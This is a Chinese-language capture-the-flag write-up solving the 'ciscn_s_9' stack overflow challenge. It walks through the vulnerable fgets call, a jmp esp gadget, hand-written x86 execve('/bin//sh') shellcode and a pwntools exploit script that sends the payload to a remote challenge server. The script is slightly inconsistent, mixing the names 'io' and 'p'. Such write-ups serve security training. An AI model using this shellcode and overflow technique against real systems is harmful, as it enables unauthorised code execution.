采用汇编手写shellcode写入栈解题ciscn_s_9

pwntools工具生成的shellcode一般是70到100字节左右,采用shellocde = asm(shellcraft.sh())

而当缓冲区溢出的空间太少以至于自动生成的sc不能正常衔接ebp与返回地址时,需要手写shellocde填入缓冲区构造新的栈帧。
书写shellcode参考学习链接:

linux上的shellcode写法(pwntools,手写shell)_pwntools生成shellcode-CSDN博客

1.检查文件类型,32位,NX保护未打开。查看函数主要在pwn()部分,利用缓冲区读入的s溢出点,布局构造新的栈帧分布。

cs 复制代码
#main函数
int pwn()
{
  char s[24]; // [esp+8h] [ebp-20h]

  puts("\nHey! ^_^");
  puts("\nIt's nice to meet you");
  puts("\nDo you have anything to tell?");
  puts(">");
  fflush(stdout);
  fgets(s, 50, stdin);
  puts("OK bye~");
  fflush(stdout);
  return 1;
}

ida中还有hint函数,按tap键进入汇编窗口,代码如下:

cs 复制代码
push    ebp       #压入ebp
mov     ebp, esp  #将ebp的值赋予esp,及更新函数基址地址
jmp     esp       #跳转到当前函数的esp

它的作用是保存当前函数的调用者的栈帧指针(ebp),然后将当前栈指针(esp)赋值给ebp,最后通过跳转指令(jmp esp)将控制流转移到当前栈指针所指向的位置。也就是说创建了一个新的栈帧,将当前函数的栈指针设置为新的栈帧指针。利用此jmp esp的地址0x08048554作为返回地址。

2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。

因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;call esp结束跳转到esp,参考上图完成shellcode的写入。

汇编下的shellcode,一般得到shell都是传入"bin/sh"字符,x86下的shellcode如下:

bash 复制代码
xor eax,eax            #异或使得eax为0
xor ebx,ebx            #异或使得ebx为0
xor edx,edx            #异或使得edx为0
xor ecx,ecx            #异或使得ecx为0
push edx               #压入edx
push 0x68732f2f        #压入//sh
push 0x6e69622f        #压入/bin
mov ebx,esp            #让ebx指向esp
mov al,0xB             #给al赋值0xb
int 0x80               #执行0x80

说明:

1.小端序下的bin/sh的ASCⅡ代码反过来输入,如"h"的ASCⅡ代码为0x68,"s"为0x73,"/"为0x2f。(输入//sh的原因是为了填充满4个字节,/bin/sh和/bin//sh等同)

2.al为eax寄存器的低8位,0xb是execve的系统调用号。(之前文章记载)

wp如下:欢迎各位师傅指正!

python 复制代码
from pwn import *

io = remote('nodeX.buuoj.cn',XXXX)
#io = process('./ciscn_s_9')
context(log_level='debug',arch='i386',os='linux')

jump_esp=0x08048554

shellcode='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xB
int 0x80
'''

shellcode=asm(shellcode)

payload=shellcode.ljust(0x24,b'\x00')+p32(jump_esp)


payload+=asm("sub esp,40;call esp")

p.sendline(payload)
p.interactive()
相关推荐
萨格拉斯救世主17 分钟前
戴尔R930服务器增加 Intel X710-DA2双万兆光口含模块
运维·服务器
Jtti20 分钟前
Windows系统服务器怎么设置远程连接?详细步骤
运维·服务器·windows
TeYiToKu23 分钟前
笔记整理—linux驱动开发部分(9)framebuffer驱动框架
linux·c语言·arm开发·驱动开发·笔记·嵌入式硬件·arm
dsywws26 分钟前
Linux学习笔记之时间日期和查找和解压缩指令
linux·笔记·学习
yeyuningzi34 分钟前
Debian 12环境里部署nginx步骤记录
linux·运维·服务器
上辈子杀猪这辈子学IT1 小时前
【Zookeeper集群搭建】安装zookeeper、zookeeper集群配置、zookeeper启动与关闭、zookeeper的shell命令操作
linux·hadoop·zookeeper·centos·debian
minihuabei1 小时前
linux centos 安装redis
linux·redis·centos
进击的六角龙1 小时前
Python中处理Excel的基本概念(如工作簿、工作表等)
开发语言·python·excel
一只爱好编程的程序猿1 小时前
Java后台生成指定路径下创建指定名称的文件
java·python·数据下载
EasyCVR1 小时前
萤石设备视频接入平台EasyCVR多品牌摄像机视频平台海康ehome平台(ISUP)接入EasyCVR不在线如何排查?
运维·服务器·网络·人工智能·ffmpeg·音视频